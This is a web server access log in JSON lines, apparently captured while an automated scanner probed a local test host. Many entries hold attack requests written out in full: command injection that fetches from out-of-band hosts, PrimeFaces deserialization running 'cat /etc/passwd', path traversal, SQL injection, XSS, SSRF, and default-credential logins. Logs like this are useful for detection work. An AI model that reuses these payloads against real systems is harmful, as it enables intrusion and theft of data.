+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://ca28fg0smpvbd3qg07h0h6xqim8ri8kyd.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"json={\x22url\x22:\x22/general/../../mysql5/my.ini\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ispirit/interface/gateway.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pureweb/server/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://ca28fg0smpvbd3qg07h0cyfk6a8myjywr.oast.live%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://ca28fg0smpvbd3qg07h0t9it8sbbu84e1.oast.live%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.zul HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/29KD1tHdcSYjVc2kRmtc4AXoRxW/)%3B%3C%2Fscript%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://ca28fg0smpvbd3qg07h0jrdkckomt3mow.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_canteen&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://ca28fg0smpvbd3qg07h0hhasmeh1ewa4e.oast.live`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://ca28fg0smpvbd3qg07h0634tr11ku7ks4.oast.live%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://ca28fg0smpvbd3qg07h0ozcb98c9pamru.oast.live%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbdump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"------WebKitFormBoundaryoZ8meKnrrso89R6Y\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22; filename=\x22../../../../../../../tmp/poc\x22\x0D\x0A\x0D\x0Atest-poc\x0D\x0A------WebKitFormBoundaryoZ8meKnrrso89R6Y--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KD268RWq6H6unPEbRuMCTtg7S/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dotAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 